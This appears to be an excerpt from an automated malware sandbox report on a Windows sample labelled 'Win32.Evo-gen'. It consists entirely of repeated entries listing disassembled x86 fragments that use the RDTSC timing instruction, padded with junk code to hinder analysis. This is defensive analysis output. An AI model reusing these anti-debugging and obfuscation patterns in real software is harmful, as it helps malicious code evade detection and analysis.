                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 103741C second address: 1037420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 103856B second address: 103859B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D85h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F449CC63D7Eh 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1038687 second address: 103868B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 103868B second address: 10386B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F449CC63D89h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10386B1 second address: 10386B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 103A6D9 second address: 103A6DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 103B3D6 second address: 103B3DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 103A6DD second address: 103A6E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 103B3DD second address: 103B3F4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jo 00007F449CEB0736h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jo 00007F449CEB0740h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 103B3F4 second address: 103B45D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F449CC63D78h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000016h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push edx 0x00000028 call 00007F449CC63D78h 0x0000002d pop edx 0x0000002e mov dword ptr [esp+04h], edx 0x00000032 add dword ptr [esp+04h], 00000019h 0x0000003a inc edx 0x0000003b push edx 0x0000003c ret 0x0000003d pop edx 0x0000003e ret 0x0000003f sub bx, E340h 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F449CC63D87h 0x0000004c rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 103B5EB second address: 103B5F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 103B5F0 second address: 103B6AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D7Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a ja 00007F449CC63D90h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F449CC63D78h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b jo 00007F449CC63D7Ch 0x00000031 mov dword ptr [ebp+122D1E1Bh], ebx 0x00000037 push dword ptr fs:[00000000h] 0x0000003e mov dword ptr [ebp+124492C4h], edx 0x00000044 mov dword ptr fs:[00000000h], esp 0x0000004b push 00000000h 0x0000004d push ebx 0x0000004e call 00007F449CC63D78h 0x00000053 pop ebx 0x00000054 mov dword ptr [esp+04h], ebx 0x00000058 add dword ptr [esp+04h], 00000014h 0x00000060 inc ebx 0x00000061 push ebx 0x00000062 ret 0x00000063 pop ebx 0x00000064 ret 0x00000065 mov eax, dword ptr [ebp+122D13A1h] 0x0000006b mov bx, ax 0x0000006e push FFFFFFFFh 0x00000070 movsx ebx, dx 0x00000073 mov dword ptr [ebp+122D1E36h], edx 0x00000079 nop 0x0000007a pushad 0x0000007b pushad 0x0000007c jnp 00007F449CC63D76h 0x00000082 jbe 00007F449CC63D76h 0x00000088 popad 0x00000089 push eax 0x0000008a push edx 0x0000008b jng 00007F449CC63D76h 0x00000091 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10428FE second address: 1042911 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F449CEB0736h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F449CEB0736h 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10231A6 second address: 10231AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: FDE914 second address: FDE923 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB073Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: FDE923 second address: FDE92D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: FDE92D second address: FDE931 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: FDE931 second address: FDE943 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jnp 00007F449CC63D76h 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 104A400 second address: 104A454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 push eax 0x00000007 jp 00007F449CEB0743h 0x0000000d jmp 00007F449CEB073Dh 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jl 00007F449CEB0742h 0x0000001c jmp 00007F449CEB073Ch 0x00000021 mov eax, dword ptr [eax] 0x00000023 jmp 00007F449CEB0744h 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c push eax 0x0000002d push edx 0x0000002e je 00007F449CEB0738h 0x00000034 push ebx 0x00000035 pop ebx 0x00000036 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 104A50F second address: 104A533 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D7Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F449CC63D81h 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 104A533 second address: 104A539 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 104A539 second address: 104A53D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 104A53D second address: 104A553 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F449CEB0736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 104A553 second address: 104A557 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 104A557 second address: 104A55D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 104A55D second address: 104A563 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 104A563 second address: 104A572 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 104A572 second address: 104A576 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 104F68E second address: 104F692 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 104F692 second address: 104F6B8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F449CC63D76h 0x00000008 jmp 00007F449CC63D89h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 104F6B8 second address: 104F6C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jnl 00007F449CEB0736h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 104F6C8 second address: 104F6DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007F449CC63D76h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 104FC37 second address: 104FC53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F449CEB0736h 0x0000000a pop ecx 0x0000000b pushad 0x0000000c jmp 00007F449CEB073Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 104FF2E second address: 104FF3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F449CC63D7Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1054AC4 second address: 1054ACA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1054BE3 second address: 1054BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1054BE8 second address: 1054BF2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F449CEB0742h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1054BF2 second address: 1054BF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 105505E second address: 1055064 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1055064 second address: 1055084 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F449CC63D7Ch 0x00000008 pushad 0x00000009 jmp 00007F449CC63D7Fh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10551D2 second address: 10551D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10551D6 second address: 10551FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F449CC63D8Dh 0x0000000c jmp 00007F449CC63D85h 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10551FC second address: 1055230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F449CEB0747h 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F449CEB0740h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 105569C second address: 10556A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10556A0 second address: 10556A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1008805 second address: 1008809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1008809 second address: 100880D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 100880D second address: 1008813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1008813 second address: 1008819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: FDCEAF second address: FDCEC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F449CC63D7Eh 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: FDCEC2 second address: FDCEDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB0745h 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1055DCE second address: 1055DD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1055DD2 second address: 1055DDC instructions: 0x00000000 rdtsc 0x00000002 js 00007F449CEB0736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1054614 second address: 1054642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F449CC63D88h 0x00000009 jg 00007F449CC63D76h 0x0000000f popad 0x00000010 jmp 00007F449CC63D7Bh 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1059BA2 second address: 1059BA8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1059BA8 second address: 1059BAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1059BAE second address: 1059BCD instructions: 0x00000000 rdtsc 0x00000002 jng 00007F449CEB0738h 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F449CEB0741h 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: FE55FD second address: FE5617 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D86h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: FE5617 second address: FE564D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F449CEB074Ah 0x0000000c push esi 0x0000000d pop esi 0x0000000e jmp 00007F449CEB0742h 0x00000013 pushad 0x00000014 ja 00007F449CEB0736h 0x0000001a push esi 0x0000001b pop esi 0x0000001c jno 00007F449CEB0736h 0x00000022 popad 0x00000023 popad 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 105E1F9 second address: 105E1FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 105E387 second address: 105E391 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F449CEB0736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 105E391 second address: 105E396 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 105E396 second address: 105E3C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F449CEB0745h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007F449CEB0748h 0x00000012 push eax 0x00000013 push edx 0x00000014 jno 00007F449CEB0736h 0x0000001a rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 105E7EF second address: 105E81B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F449CC63D76h 0x0000000a jmp 00007F449CC63D84h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F449CC63D7Bh 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 105E81B second address: 105E854 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007F449CEB0736h 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 js 00007F449CEB0738h 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 popad 0x00000019 pushad 0x0000001a jnp 00007F449CEB0753h 0x00000020 jmp 00007F449CEB0747h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 105E854 second address: 105E85B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 105EE1B second address: 105EE21 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 105EE21 second address: 105EE2B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F449CC63D7Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 105EF8B second address: 105EF8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 105F278 second address: 105F285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F449CC63D76h 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 105F285 second address: 105F2AF instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F449CEB0736h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push edx 0x0000000e jmp 00007F449CEB0744h 0x00000013 push eax 0x00000014 push edx 0x00000015 jo 00007F449CEB0736h 0x0000001b rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1060C15 second address: 1060C1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1069F53 second address: 1069F57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1069F57 second address: 1069F71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F449CC63D7Dh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1069F71 second address: 1069F77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1068E04 second address: 1068E08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1068E08 second address: 1068E18 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F449CEB0736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1068E18 second address: 1068E20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
